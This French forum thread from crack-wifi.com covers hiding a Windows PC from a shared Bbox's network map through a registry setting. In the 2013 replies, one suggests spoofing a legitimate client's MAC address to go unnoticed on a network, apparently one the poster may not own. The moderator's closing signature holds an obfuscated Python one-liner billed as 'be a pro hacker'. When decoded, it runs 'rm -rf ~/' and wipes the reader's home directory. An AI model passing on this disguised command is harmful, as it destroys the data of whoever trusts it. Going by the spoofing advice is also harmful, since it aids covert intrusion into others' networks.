Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-06-2011 14:19:13

darksabersan
Membre Hyperactif
Lieu : Toujours dans la lune

Se cacher du schéma réseau.

Bonjour à tous,

Voici ma question.

Je suis sous Se7en et je partage avec une amie une connexion Bbox.
Je voudrais savoir s’il est possible de me cacher de son schéma réseau ainsi que du voisinage réseau sous Windows.

J'ai déjà tenté de faire sous CMD: net config server /hidden:yes , mais ça ne donne rien. Même après un reboot et avoir attendu une heure pour voir si j'avais disparu.

Merci d'avance.

Darksabersan.

##############
Le savoir pour tous.
##############

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-08-2011 01:21:36

tbk-amine
Membre Radioactif
Lieu : sous ubuntu

Re : Se cacher du schéma réseau.

salut
j'ai pas assez bien compris ta question si tu veux bien expliquer tu voudrais ne pas apparaitre dans le rsx lorsque tu y est co pour cela il suffit que tu detourne ta connexion ou te connecté a un autre rsx en utilisant un vpn

#3 08-08-2011 21:23:24

M1ck3y
Administrateur
Lieu : Lost in the darkness

Tbk-amine, merci de ne pas déterrer de vieux sujets si c'est pour y poster ce type de réponse rédigée n'importe comment et qui n'apporte absolument rien. Cela ne sert à rien d'aller répondre à tous les sujets avec des posts mal rédigés, du langage sms et des phrases souvent incompréhensibles. Tu dois faire un réel effort rédactionnel lorsque tu rédiges un message sur le forum, sans quoi tu vas te faire bannir (quand j'en aurais marre d'avoir mal à la tete à essayer de déchiffrer ton charabia).

#4 09-08-2011 00:17:26

tbk-amine
Membre Radioactif

salut désolé je n'utilise pas de language sms je fais seulement des abréviation en plus je répond selon  ce que je sais et ce dont je suis su, je prend 30min pour repondre a un sujet et stp etre le MDF ne te donne pas le droit de me menacer pour si peu au contraire moi j'ai aimé ce forum et je voudrais qu'il soit le meilleur je répond je cherche pour ne laissé aucun sujet avec 0 reponse je suis KaYoS si tu me reconnais

Dernière modification par tbk-amine (09-08-2011 00:19:27)

#5 09-08-2011 01:10:27

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

tbk-amine a écrit :

salut désolé je n'utilise pas de language sms je fais seulement des abréviation en plus je répond selon  ce que je sais et ce dont je suis su, je prend 30min pour repondre a un sujet et stp etre le MDF ne te donne pas le droit de me menacer pour si peu au contraire moi j'ai aimé ce forum et je voudrais qu'il soit le meilleur je répond je cherche pour ne laissé aucun sujet avec 0 reponse je suis KaYoS si tu me reconnais

Plop, faut pas le prendre comme ça, je t'ai également fais à peu près la même réflexion dans l'après midi.

Sur ce topic

En ce qui concerne le règlement du forum il stipule que le language sms est a éviter.
Les abréviations peuvent être assimilées à du language sms quand elles interviennent de manière systématique.
De plus si tu veux aider quelqu'un qui éventuellement débute, en utilisant des abréviations je doute qu'il y pige quoi que ce soit.

Si comme tu le dis tu aimes ce forum et que tu souhaites qu'il soit meilleur alors.

Prends le temps de relire tes réponses qui dès fois, ne le prend pas mal, mais ressemblent à de l'hébreux smile.

Ou alors tu réponds sur des topics ou les sujets ont déjà été réglés. smile (Perte de temps)

Prends également le temps de regarder les dates de certains topics que tu as déterré.
Tu verras que sans doute la personne en question ne sait même plus qu'elle a été inscrite ici un jour.

Ce que je veux dire par la c'est que même si cela part d'une bonne intention,  1 post bien rédigé (on ne te demande pas d'être un crack en ortographe mais de faire des phrases comprhéensibles et soignées).
Vaut mieux que 10 réponses bâclées. (C'est apparemment l'effet que ça fait)

Ce n'est pas la quantité qui compte mais la qualité.

Si des posts restent à 0 réponses, ce n'est pas un drame (moi j'en ai plein smile), le posteur est assez grand pour faire remonter son topic en dernier recours si il le juge utile.

Bref cool quoi bigsmoke

Cordialement.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 09-08-2011 19:37:57

tbk-amine
Membre Radioactif

merci noireaude crois le ou pas je t'aime bien smile

#7 09-08-2011 19:40:27

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Lol merci smile

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#8 26-08-2011 19:44:10

pamputt
Membre Hyperactif

Bon, je vais essayer de répondre à la question. Sur Windows, il faut ouvrir l’éditeur de base de registre (Démarrer / Executer / Regedit) puis vous rendre sur la clé suivante : HKEY_LOCAL_MACHINE_SYSTEM -> currentcontrolset -> services -> lanmanserve- >parameters et créez une nouvelle valeur DWORD 32 bits que vous nommerez « Hidden » avec une valeur de « 1 ». Il ne reste plus qu'à rebooter.

Si on veut le rendre de nouveaux visibles, il faut supprimer cette clé et redémarrer.

#9 23-04-2013 16:33:57

SeeWhy
N00b

Bonjour, je m'inscris et je déterre ce vieux post...
Je suis sur Windows 7 64bits, j'ai réussi à me masquer du réseau windows, mais mon pbm reste de ne plus apparaître sur l'interface BBOX, dans l'onglet : schéma du réseau. C'est une bonne sécurité finalement, car si qqun crack la clé WEP ou WPA (en ce qui me concerne, via la faille WPS), il apparait ensuite bien visible lui et son adresse MAC sur la BBOX, et la "victime" n'a plus qu'à mettre un bon filtrage MAC....(et désactiver le WPS).
Alors qqun a une idée de comment devenir invisible sur l'iterface BBOX ? wink MERCI

#10 23-04-2013 18:35:00

Furyo
Membre Irremplaçable
Site Web

SeeWhy a écrit :

Bonjour, je m'inscris et je déterre ce vieux post...
Je suis sur Windows 7 64bits, j'ai réussi à me masquer du réseau windows, mais mon pbm reste de ne plus apparaître sur l'interface BBOX, dans l'onglet : schéma du réseau. C'est une bonne sécurité finalement, car si qqun crack la clé WEP ou WPA (en ce qui me concerne, via la faille WPS), il apparait ensuite bien visible lui et son adresse MAC sur la BBOX, et la "victime" n'a plus qu'à mettre un bon filtrage MAC....(et désactiver le WPS).
Alors qqun a une idée de comment devenir invisible sur l'iterface BBOX ? wink MERCI

Tout d'abord, Bonjour et Bienvenu sur le forum wink

A mon humble avis, faudrait pouvoir flasher la BBox pour arriver à cela et encore, je n'en suis même pas certain...

Donc, soit :

- Tu bosses chez Bouygues et tu as acces à la partie "Dev" du software et tu le modifie en consequences de cause et selon ce que tu souhaites faire...
- Tu copie l'adresse MAC d'une client qui se connecte regulierement à la box et tu l'empreintes pour te faire passer pour ce client legitime et connu du proprietaire de la Box...

J'aime pas trop ce genre de questions qui laisse entendre que l'on se connecte sur un reseau dont on est pas le propriétaire...

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#11 26-04-2013 16:34:48

spawn
Modérateur

Dès que tu as une IP tu apparais dans cette interface.
Donc c'est réglé, tu ne peux pas (:

Comme dit Furyo, le mieux est de modifier le code de cette page dans la box en la flashant ou pluis doucement, c'est peut être possible.

Dis-nous si tu arrives à quelque chose ! (:

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Annonce